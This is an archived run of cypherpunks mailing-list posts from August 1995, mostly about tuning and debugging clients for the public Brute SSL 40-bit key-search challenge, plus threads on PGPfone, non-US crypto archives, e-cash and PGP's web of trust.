In-Reply-To: <199508240448.VAA12304@quesnay.Berkeley.EDU>
Message-ID: <Pine.LNX.3.91.950823233650.3783J-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 23 Aug 1995, Sam Quigley wrote:

> Date: Wed, 23 Aug 1995 21:48:33 -0700
> From: Sam Quigley <poodge@econ.Berkeley.EDU>
> To: cypherpunks@toad.com
> Subject: Linux brutessl client
> 
> 
> Hi.
> 
> I've been able to compile a working brutessl 1.02 cllient under linux
> and gcc 2.7.0, but I get abysmal search speeds.
> 
> My system is a pentium 60, which, according to the docs, ought to have
> a speed of something over 14100 kps (that's what a 486dx2/66 with no
> rotate left macro gets).
> 
> brutessl -t reports that my system can do 11200 keys per second.

i'm running linux 1.2.11 on my DX4-100 (might be faster than your P60) 
and i get these results..

zifi:~/crypto/ssl> brutessl -t

                                BruteSSL 1.0

Self test... OK

17 minutes and 8 seconds per segment, 16300 keys per second.
zifi:~/crypto/ssl> file brutessl
brutessl: ELF 32-bit LSB executable i386 (386 and up) Version 1


the perl code doesn't seem to work quite right for me though, giving 
errors when i try to use more than one option at a time, ie.

Identifier "main::dkltrc4" used only once: possible typo.

anyway, i'm not sure i'll be participating this time as i won't be around 
too much.

ciao,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDwSA03Qo/lG0AH5AQG1jQP/ec+MO0BTFGF53eWohIlCBxpdaXnCnFJe
9TvhbRPX7kjuVyVKcuT6KdHrZ/+qrsLAXCrlml5UuAemUmyAE4NeR3NrbJ7rgXWg
g+UfzIC46799/MNu0XQeCZdip2aq+3VojakoPcd/VThW7BUKxdJeNyP/C8XhjxMg
+tLRnuiVrjA=
=xGxM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Wed, 23 Aug 95 20:57:45 PDT
To: cypherpunks@toad.com
Subject: PGPfone Release is coming soon!
Message-ID: <ac61a8bd000210043604@[18.72.0.238]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As you may have seen, the news media has picked up on the upcoming
PGPfone release. This note is to let you know that we at MIT are working
with Phil Zimmermann and the PGPfone team to distribute PGPfone from
MIT. We expect to have a *BETA* test version (Macintosh Only) of PGPfone
available shortly.

We will distribute PGPfone via anonymous FTP from net-dist.mit.edu. Look
in the /pub/PGPfone directory (which doesn't yet exist).

We will also be distributing PGP via the World Wide Web from:

                   http://web.mit.edu/network/pgpfone

This "Home" page already exists, but doens't have the distribution yet.
Feel free to check it periodically, as it will be changed as soon as the
distribution is ready.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDv4lMUtR20Nv5BtAQEyFAP+J3oFHuwKiOu56CtYSvA7WJUGgZg37zRj
QPmMfnOD5/9nGUXGsQjs3NTMwV4Y+de4mM3Qxi/O/G0ID1aGod8pPbDkyh6wG594
FVWLu6c1E7pZcge1/Iv9nwBKbHAhOzh368YYMTIsiIlE3hjRB37/iVmIcQsOhleQ
4Qp8aJSEim8=
=Mskz
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 24 Aug 95 00:00:30 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508240700.AAA15310@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance -- slight.

At 09:47 AM 8/23/95 -0700, Timothy C. May wrote:
> Moore's Law is an observation of past behavior, not a law of
> nature. Gordon thought the curve would "slow down" around 
> 1980 or so. It didn't, for various reasons. But many of us 
> expect it will.
>
> Consider that a new wafer fab capable of building these 
> "Moore's Law"devices has increased in price from about $50 
> million a couple of decades ago to about $1.5 billion today. 

During the entire period that Moore's law has been in effect, we have used
light to print the wafers.

Now, with phase shifting masks in billion dollar fabs, we are reaching the
absolute limits of light.  If we go up to higher frequencies, we lose
refraction, and phase shifting fails.  Refractable light craps out at about
.3 to .15 microns.  Intel is currently at .35 microns.

There will be a slight hiccup or a major hesitation in Moore's law as the
fabs switch to a non optical printing process.

Current contenders are:

* Synchrotron radiation  (twenty billion dollar fabs, or worse.)

* ions  (fab price jumps a few times higher than current fab price.)

* electrons (no great escalation in fab price, but a radical drop in
production rates)

* flexible direct contact.  (fab price goes way down, back to producing ICs
in your garage.)

The flexible direct contact method has enough horsepower to take us all the
rest of the way down merge with biotech and to produce wires one atom thick
-- assuming that people manage to get anything useful out of it at all.

There have been very large investments in all of the above research
projects, and so far non of them have worked as yet. (But they are all of
them a hell of a lot closer to working than nanotech.)

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 24 Aug 95 00:05:28 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Random Hiss from Mac mike
Message-ID: <199508240702.AAA24391@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 8/23/95 +0100, Andrew Spring wrote:
>In the simplest case, where the microphone is not attached, the signal
>consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
>problem transforming this into uniformly distributed RN's : just hash the
>buffer with MD5.

If you know that's what the signal looks like, you can improve it a lot by
run-length encoding before doing the MD5, e.g. crunch the output down to 
a series of count1 value1 count2 value2 count3 value3 (if you stick to runs of
255, you can use 1 byte for each.)   That gives you a much shorter input to
the MD5,
and a more realistic view of how much random data you have.  
(I suppose it may make it harder to do things like Fourier transforms on it...)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 23 Aug 95 22:54:02 PDT
To: cypherpunks@toad.com
Subject: Brute SSL Challenge
Message-ID: <199508240552.AAA00601@gnupln8.usis.com>
MIME-Version: 1.0
Content-Type: text/plain



Just skip this silly little message if you know enough to
optimize the brutessl code.


Didn't know of a better place to put this, so please no flames.

Hopefully everyone on here is accomplished enough to know
optimizing the brutessl code helps immensely.  If not, well I used

gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
                     brutessl.c search.o

To go from 5,000 keys per second to 10,100 keys per second.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 23 Aug 95 23:52:30 PDT
To: cypherpunks@toad.com
Subject: Global Investing using Electronic Tools
Message-ID: <199508240929.EAA26390@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


The Business Week Guide to Global Investments using Electronic Tools.

Dear Cypherpunks,

   While I was hunting around a Waldenbooks store, I found the above
named book. Its by Robert Schwabach, published by Osborne McGraw-Hill.
It retails at $39.95 and comes with 3 3 1/2" diskettes. I just glanced
thru it. It may be of interest to some Cypherpunks. I don't know if it
would be useful for PRIVATE foreign investing or not.

                                                      Yours Truly,
                                                      Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 24 Aug 95 00:54:28 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Linux brutessl client
In-Reply-To: <"swan.cl.cam.:164680:950824065040"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.950824015247.452A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> Date: Thu, 24 Aug 1995 07:50:32 +0100
> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> To: zinc <zinc@zifi.genetics.utah.edu>
> Cc: Sam Quigley <poodge@econ.Berkeley.EDU>, cypherpunks@toad.com
> Subject: Re: Linux brutessl client
> 
> I discovered that there was a problem with "require" under perl 5.001
> (if one does a require on getopts.pl, the perl CRASHES with some flag
> combinations) so I inlined getopts.pl, and changed the comments, but left
> the first part of the sentance -- the "if you have no getopts" was omitted.
> 
> SO: in brief do *NOT* add the "s" flag to the first line of brclient !

i just want to mention that i obtained the newest code from the web site, 
compiled and everything is working fine.  i started brloop as a 
background process, hope that's ok...

anyway, seems to be doing ok.  i guess i'll know tomorrow when the 
cracking starts.

i think i'll try to get things working on an SGI i have access to as well.

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 24 Aug 95 01:13:09 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Brute SSL Challenge
In-Reply-To: <"swan.cl.cam.:169220:950824070545"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.950824020947.452B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 24 Aug 1995, Piete Brooks wrote:

> Date: Thu, 24 Aug 1995 08:05:33 +0100
> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> To: David Neal <dneal@usis.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Brute SSL Challenge
> 
> > Hopefully everyone on here is accomplished enough to know
> > optimizing the brutessl code helps immensely.  If not, well I used
> > 
> > gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> > gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
> >                      brutessl.c search.o
> > 
> > To go from 5,000 keys per second to 10,100 keys per second.
> 
> If people could send me timings for various compilers / flags I'll collate a
> table of speeds [see brutessl.h 1.02 for an example -- I tried using different
> sizes for the RC4 info and it appears that only ALPHAs really gain by using int]
> 
> I recommend that you do not blindly use the above flags -- I just tried it on
> our fastest machines (SGIs) and it *REDUCED* the speed from 35200 to 28400.

this resulted in a fairly significant increase on my machine (486
DX4-100 running Linux 1.2.11)

stats:

w/o optimizations: 
17 minutes and 45 seconds per segment, 15800 keys per second .

w/ opts:
16 minutes and 56 seconds per segment, 16500 keys per second.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDw0ZU3Qo/lG0AH5AQHuPAP/ZVR6Vec6vSj5uR5pgUiuFii1lEjT/6Xi
exPlRugI8bR5ClRZbGf+55ARRF63UXUFj9yaX4gGSE86K3guy/1o09r06VqcgIgv
i2QwhSE+kGfYNYhy7sm7u7pI+esSaa1OBOX0s2Gh9uz/TKUxJy+C/RJx3y3KKwQF
9UBkYocFEWY=
=MiL5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 23 Aug 95 19:25:00 PDT
To: enzo@ima.com
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <Pine.LNX.3.91.950823151630.14787E-100000@ima.net>
Message-ID: <199508240224.FAA06635@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> > I just spent an hour surfing the various crypto/cypherpunks web sites. In
> > this hour I did not come across a single non-US site that carried anything
> > else but PGP. Most non-US sites just carry rants about the evil ITAR, and
> Try these URL's:

Finland: ftp://ftp.funet.fi/pub/crypt
Sweden: ftp://ftp.sunet.se/pub/security/tools/crypt
Russia: ftp://ftp.kiae.su/pub/unix/crypto
Norway: ftp://ftp.unit.no/pub/unix/security
Australia: ftp://ftp.psy.uq.os.au/pub/Crypto

I have created a set of WWW pages at http://www.cs.hut.fi/ssh/crypto
that contains a lot of material and references to cryptographic
software, algorithms, and related information available outside the
US.  I'll expand the pages as I get suggestions for more things to put
there.  The pages will probably be quite stable and I'll try to
maintain them, so it is possible to refer to those pages wherever
references are needed for crypto archives outside the United States.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 23 Aug 95 23:51:01 PDT
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: Linux brutessl client
In-Reply-To: <Pine.LNX.3.91.950823233650.3783J-100000@zifi.genetics.utah.edu>
Message-ID: <"swan.cl.cam.:164680:950824065040"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> the perl code doesn't seem to work quite right for me though, giving 
> errors when i try to use more than one option at a time, ie.
> Identifier "main::dkltrc4" used only once: possible typo.

Sorry about that ....

I discovered that there was a problem with "require" under perl 5.001
(if one does a require on getopts.pl, the perl CRASHES with some flag
combinations) so I inlined getopts.pl, and changed the comments, but left
the first part of the sentance -- the "if you have no getopts" was omitted.

SO: in brief do *NOT* add the "s" flag to the first line of brclient !

There are new versions of brloop and brclient which might cope better with
problems with the transatlantic link -- you should use brc0.09 and brl0.03

> anyway, i'm not sure i'll be participating this time as i won't be around 
> too much.

All the better -- your machine will have more cycles for CRACKing !
The purpose of SKSP is to make it work when you are not in ...


There is a "how to" page referenced from http://www.brute.cl.cam.ac.uk/brute/
which includes some "fault finding" tips.
If you have problems, look there first.
If that doesn't help, email me, and I'll add any "common" problems to the
"how to".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 00:06:01 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Brute SSL Challenge
In-Reply-To: <199508240552.AAA00601@gnupln8.usis.com>
Message-ID: <"swan.cl.cam.:169220:950824070545"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Hopefully everyone on here is accomplished enough to know
> optimizing the brutessl code helps immensely.  If not, well I used
> 
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
>                      brutessl.c search.o
> 
> To go from 5,000 keys per second to 10,100 keys per second.

If people could send me timings for various compilers / flags I'll collate a
table of speeds [see brutessl.h 1.02 for an example -- I tried using different
sizes for the RC4 info and it appears that only ALPHAs really gain by using int]

I recommend that you do not blindly use the above flags -- I just tried it on
our fastest machines (SGIs) and it *REDUCED* the speed from 35200 to 28400.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 00:31:41 PDT
To: dneal@usis.com (David Neal)
Subject: Brute SSL Challenge
Message-ID: <9157.9508240731@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -c search.c
> gcc -O6 -funroll-loops -fomit-frame-pointer -finline-functions -o brutessl \
>                      brutessl.c search.o

You wouldn't happen to have gcc under DOS would you?

Or anyone else with djgcc for DOS?

What would be really nice would be a 32 bit DOS executable, which is
very hard to obtain with any PC software, and compiling it 16 bit
suffers a huge performance hit.

In search of a 32 bit DOS binary,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 24 Aug 95 06:38:39 PDT
To: cypherpunks@toad.com
Subject: A good war cry is hard to find.
Message-ID: <199508241338.GAA11347@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Brother, can you spare a CPU cycle?

Give me your tired, your poor, your spare CPU cycles!

I never met a spare CPU cycle I didn't like.

Ladies & Gentlemen, start your spare CPU cycles!

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 00:55:28 PDT
To: somogyi@digmedia.com (Stephan Somogyi)
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <9231.9508240754@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I have a working version of BruteSSL 1.02 (without SKSP client) for
> Power Macintosh. However, as I don't want to run the risk of
> violating ITAR, I'm still investigating ways of making it
> available. Suggestions are welcome.

Just send it along... several people have been shipping various DOS
binaries out of the US, with out the source.

The presumption taken was that as long as they didn't ship search.c or
assembly.c, there is no crypto source, and the binary could not be
used to encrypt anything.  (Also it's for SSL with 40 bit keys which
is export approved anyway).

You can ship a diff for brutessl.c (which contains no crypto code) if
you want the mods to be mixed back in (please include some kind of
#ifdef __MAC or whatever the standard _i_am_a_mac macro is).  Or if
that makes you uncomfortable, well we'll do with out the source.

Reckon you'd be safe enough.

Anyone think otherwise?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 24 Aug 95 07:01:53 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <Pine.PMDF.3.91.950824094255.620953214B-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SOL.3.91.950824090026.23418D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Income tax, right--but may not this be correct about excise
taxes?

MacN

On Thu, 24 Aug 1995, Michael Froomkin wrote:

> On Wed, 23 Aug 1995, Alan Penny wrote:
> [snip]> 
> > This also has the interesting feature of avoiding all taxes. Until you
> > "cash out" your account you would not have to pay taxes, if you never
> > need cash out your account, you never need to pay taxes. I suspect that
> > our friendly governments would try to "correct" this "problem" in the
> > long run if they can.
> > 
> Nyet.  Any time you barter A for B, even electronically, you have a 
> taxable event.  All you have done in the above is describe a system in 
> which it is harder to detect the taxable event.
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | mfroomki@umiami.ir.miami.edu
> U. Miami School of Law     | 
> P.O. Box 248087            | It's hot here.  And humid.
> Coral Gables, FL 33124 USA |
> See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 24 Aug 95 06:11:58 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Crypto DLL's/SSLeay 0.4.5
In-Reply-To: <Pine.SOL.3.91.950824215822.9077D-100000@orb>
Message-ID: <199508241311.JAA13033@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> On the PGPphone issue, I Personally I feel SSLphone would be a much 
> better way of doing things.

Oh, yeah? No user certificates, no way to verify whats on the other
end. No assurances that you aren't being tricked into using a weak
algorithm because negotiation doesn't take place under cover of
signature. Lots of little potential cracks. Thanks, but no thanks.

This is not to slight your code. I'm slighting the protocol.

If folks want to secure links, stick to clean protocols to do the key
negotiation. I'm a fan of variants of STS myself, Photuris being a
biggie.

> For phone over modem, authentication is not really required

And why is that?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Thu, 24 Aug 95 06:45:13 PDT
To: Alan Penny <penny@tyrell.net>
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <199508240410.AA14034@tyrell.net>
Message-ID: <Pine.PMDF.3.91.950824094255.620953214B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Alan Penny wrote:
[snip]> 
> This also has the interesting feature of avoiding all taxes. Until you
> "cash out" your account you would not have to pay taxes, if you never
> need cash out your account, you never need to pay taxes. I suspect that
> our friendly governments would try to "correct" this "problem" in the
> long run if they can.
> 
Nyet.  Any time you barter A for B, even electronically, you have a 
taxable event.  All you have done in the above is describe a system in 
which it is harder to detect the taxable event.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 24 Aug 95 09:11:37 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <8AFC259.0003000363.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


BW> Be that as it may, I still think that Zimmermann assumed that
BW> key<->real-life-identity mappings would be the primary purpose for the Web
BW> of Trust when he wrote "pgpdoc1.txt".  And I think he was wrong about that.
BW> It is not "arrogant" or "offensive" to say that someone was wrong when you
BW> believe that to be the case.

  Actually, this is what qualifies as a "wicked problem". Until pgp 1.0
came along, there was no way to know how people would =actually= use a
public-key system. (Sure, there were lots of theories, and a few
academic experiments, but those don't count as RL.)

  Phil tried to anticipate the kinds of errors that would be made by
people unaccustomed to thinking in terms of attacks and threat models.
Face it, the average.net.person is not into game theory. Phil was under
severe time pressure to get a workable public key system out the door
before the government slammed it shut in his face.

  Now that we have had an opportunity to observe people using the
system, we can identify nuances that could never have been debugged on
the test bench. We can explain to people the various paradigms for
viewing keys, and the importance of being able to trust the "identity"
of an anon.id, which seems oxymoronic on the face of it.


  Some kind of explanation by analogy seems in order: We all know of
movie stars who changed their names for Show Biz, or authors who wrote
under pseudonyms. Take Mark Twain for example. A person who had read a
Twain book, or had friends (his own WOT) tell him how good/bad Twain
books were, would develop his opinion of the man's work. His ultimate
decision to (not) buy a particular Twain book has nothing to do with
the True Name of Mr. Clemens.

  Where it =does= come into play is in the realm of law. Had Twain
libelled a person, the means to identify the Man behind the Mask would
be integral to executing the judgement of the court. And even then, if
there were sufficient continuing royalties that could be attatched to
satisfy the judgement, it would only be necessary to know the True Name
of the publisher.

  So we must be very careful of what it is that we are certifying when
we sign something. This is what needs to be addressed in future versions
of PGP.


 * Free the Wisner Five!
 * Free the Wisner Five!
 * Free the Wisner Five!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 24 Aug 95 10:15:52 PDT
To: poodge@econ.Berkeley.EDU
Subject: Re: Linux brutessl client
Message-ID: <9508241712.AA15565@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've been able to compile a working brutessl 1.02 cllient under linux
> and gcc 2.7.0, but I get abysmal search speeds.
> 
> My system is a pentium 60, which, according to the docs, ought to have
> a speed of something over 14100 kps (that's what a 486dx2/66 with no
> rotate left macro gets).
> 
> brutessl -t reports that my system can do 11200 keys per second.

<snicker> I only get 5900 keys/second on a SPARCstation 5:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Thu, 24 Aug 95 10:15:24 PDT
To: loofbour@cis.ohio-state.edu
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <9508241716.AA16094@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



   From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
   Date: Wed, 23 Aug 1995 12:35:39 -0400

   I have yet to see a date, but Digicash states several times in their
   press releases that Cyberbucks are only a trial currency, and that at
   some point in the future the trial will come to an end.

   Will the bottom drop out of the c$ market at that point?

Will there be a collectors market for c$? Does Chaumian cash work
as collectable antiques? What is the difference in value of a "real"
signed Mickey Mantle baseball card vs. one mechanically imprinted?
Will "original" digical cash have the cachet normally associated with
obsolescent objects consisting primarily of protons and neutrons? How
much will the "provenance" of my e-cash be worth? I am assuming that
the provenance of e-cash will be the same credentials which made it
unforgable in the first place; presumably a (hobbyist?) organization
will maintain the books determining authenticity, with an obvious
self-interest to keep it afloat.

So what happens if a collectors market for antique e-cash springs up? Or
is this even conceptually possible? Or is is possible only if enough
people to make a market believe it is possible? Will Digicash open their
books or transfer them to the Smithsonian (or the computer museum) or
something? Is there a market value for the obsolete c$ database? I
wouldn't think so, but...

-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 24 Aug 95 10:28:42 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: brloop not working
In-Reply-To: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
Message-ID: <199508241726.KAA15369@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jyri Kaljundi writes:
 > I just dont seem to get brloop working. It says:
 > 
 > Command failed -- brutessl missing ?
 > 
 > what seems to be wrong is that it tries to execute command:
 > 
 > brutessl -
 > 
 > although brutessl does not have a command line option '-'. Why is the '-'=
 > =20
 > there after brutessl ?

     I get something similar:

ionia:/usr/people/pjm/src/ssl> brloop

 +++ Command failed -- brutessl missing ?
Scalar found where operator expected at (eval 12) line 3, near "*($p"
        (Missing operator before $p?)
 +++ FAILED on attempt 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]

     I'll just use the Web keyspace server if I don't get the time to
hack around with it.

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDy2P+5Yg08fDKehAQHXvwQAtaV8M5cjrPQKQIRNk0W7u9pcMkacCTL9
74K0V21JwOlUwNkBpjJZi9RFsq0LCKh0GG2ETf9LsL9aDeNFiWZvSukYGZj4L324
J2MrcmhWbqwkoYO/Ij9+bGcKqWr9fSEvXFSMQIAGM3FghZv0jyU8T8PlovXU8hjv
G64TqxKhmuw=
=To2P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 24 Aug 95 07:33:12 PDT
To: cypherpunks@toad.com
Subject: DYS_sys
Message-ID: <199508241432.KAA09835@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Observer [NYC weekly], August 28, 1995.


   "Off The Grid: Non-Slaves of New York. 'Sovereign
   citizenship' isn't just for the power line-tapping,
   compound-dwelling white supremacists anymore. A guide to
   getting The System off your back, New York-style."

      They do not run around in military fatigues, they are
      not holed up in Central Park, and for the most part,
      they do not fall into the fringes of the extreme right
      or the extreme left. Yet here they are, in the center of
      the Center, going about their daily lives with nary an
      A.T.M. or credit card in their name, without a Social
      Security or voter registration card, without insurance
      or bank accounts and driving with licenses they
      themselves have rescinded. And one more thing: They do
      not pay any income taxes.

      What was made clear by Oklahoma City and Waco and
      Ruby Ridge, Idaho, and by Ross Perot and the Unabomber
      and most recently, Bill Bradley, is that dissatisfaction
      with "the system" is pervasive in this country. Living
      off the grid is the most personal way of expressing that
      discontent.

      But, says Sharon Biggs, who teaches a three-phase, 40
      week course out of her Washington Heights home on how to
      successfully remove oneself from the system, "the
      complexion is no longer that of the wronged individual
      or visionary. It has moved into the mainstream -- people
      who suspect that there is something wrong."


   DYS_sys (17kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
